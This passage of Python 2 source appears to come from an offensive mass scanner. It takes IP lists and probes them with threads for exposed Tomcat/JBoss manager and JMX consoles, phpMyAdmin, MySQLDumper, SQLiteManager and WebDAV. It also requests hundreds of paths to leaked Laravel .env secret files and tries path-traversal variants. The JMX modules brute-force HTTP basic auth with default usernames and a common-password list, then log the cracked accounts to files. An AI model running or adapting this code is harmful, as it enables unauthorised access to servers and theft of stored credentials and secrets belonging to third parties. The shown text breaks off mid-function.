"/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", "log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", "/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : ["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", "/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", "/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", "/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", "/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", "/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", "/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", "/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", "/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", "/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", "/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", "/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", "/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", "/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", "/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") 